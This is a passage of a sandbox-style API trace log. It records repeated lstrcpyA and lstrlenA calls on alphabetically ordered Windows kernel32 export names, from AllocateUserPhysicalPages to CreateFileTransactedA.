lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0180.488] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0180.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0180.488] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0180.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0180.488] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0180.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0180.488] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0180.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0180.488] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0180.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0180.488] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0180.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0180.488] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0180.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0180.488] lstrlenA (lpString="BACKUPREAD") returned 10 [0180.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0180.488] lstrlenA (lpString="BACKUPSEEK") returned 10 [0180.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0180.488] lstrlenA (lpString="BACKUPWRITE") returned 11 [0180.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0180.488] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0180.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0180.488] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0180.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0180.488] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0180.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0180.488] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0180.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0180.488] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0180.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0180.488] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0180.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0180.489] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0180.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0180.489] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0180.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0180.489] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0180.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0180.489] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0180.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0180.489] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0180.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0180.489] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0180.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0180.489] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0180.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0180.489] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0180.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0180.489] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0180.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0180.489] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0180.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0180.489] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0180.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0180.489] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0180.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0180.489] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0180.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0180.489] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0180.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0180.489] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0180.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0180.489] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0180.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0180.489] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0180.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0180.489] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0180.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0180.489] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0180.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0180.490] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0180.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0180.490] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0180.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0180.490] lstrlenA (lpString="BEEP") returned 4 [0180.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0180.490] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0180.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0180.490] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0180.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0180.490] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0180.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0180.490] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0180.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0180.490] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0180.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0180.490] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0180.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0180.490] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0180.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0180.490] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0180.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0180.490] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0180.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0180.490] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0180.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0180.490] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0180.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0180.490] lstrlenA (lpString="CANCELIO") returned 8 [0180.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0180.490] lstrlenA (lpString="CANCELIOEX") returned 10 [0180.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0180.490] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0180.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0180.490] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0180.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0180.491] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0180.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0180.491] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0180.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0180.491] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0180.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0180.491] lstrlenA (lpString="CHECKELEVATION") returned 14 [0180.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0180.491] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0180.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0180.491] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0180.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0180.491] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0180.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0180.491] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0180.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0180.491] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0180.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0180.491] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0180.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0180.491] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0180.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0180.491] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0180.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0180.491] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0180.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0180.491] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0180.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0180.491] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0180.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0180.491] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0180.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0180.491] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0180.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0180.491] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0180.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0180.492] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0180.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0180.492] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0180.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0180.492] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0180.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0180.492] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0180.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0180.492] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0180.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0180.492] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0180.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0180.492] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0180.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0180.492] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0180.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0180.492] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0180.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0180.492] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0180.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0180.492] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0180.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0180.492] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0180.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0180.492] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0180.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0180.492] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0180.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0180.492] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0180.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0180.492] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0180.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0180.492] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0180.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0180.492] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0180.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0180.492] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0180.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0180.493] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0180.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0180.493] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0180.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0180.493] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0180.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0180.493] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0180.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0180.493] lstrlenA (lpString="COPYCONTEXT") returned 11 [0180.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0180.493] lstrlenA (lpString="COPYFILEA") returned 9 [0180.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0180.493] lstrlenA (lpString="COPYFILEEXA") returned 11 [0180.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0180.493] lstrlenA (lpString="COPYFILEEXW") returned 11 [0180.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0180.493] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0180.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0180.493] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0180.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0180.493] lstrlenA (lpString="COPYFILEW") returned 9 [0180.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0180.493] lstrlenA (lpString="COPYLZFILE") returned 10 [0180.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0180.493] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0180.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0180.493] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0180.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0180.493] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0180.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0180.493] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0180.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0180.493] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0180.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0180.493] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0180.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0180.493] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0180.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0180.494] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0180.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0180.494] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0180.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0180.494] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0180.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0180.494] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0180.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0180.494] lstrlenA (lpString="CREATEEVENTA") returned 12 [0180.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0180.494] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0180.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0180.494] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0180.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0180.494] lstrlenA (lpString="CREATEEVENTW") returned 12 [0180.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0180.494] lstrlenA (lpString="CREATEFIBER") returned 11 [0180.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0180.494] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0180.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0180.494] lstrlenA (lpString="CREATEFILEA") returned 11 [0180.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0180.494] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0180.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0180.494] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0180.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0180.494] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0180.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0180.494] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0180.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") 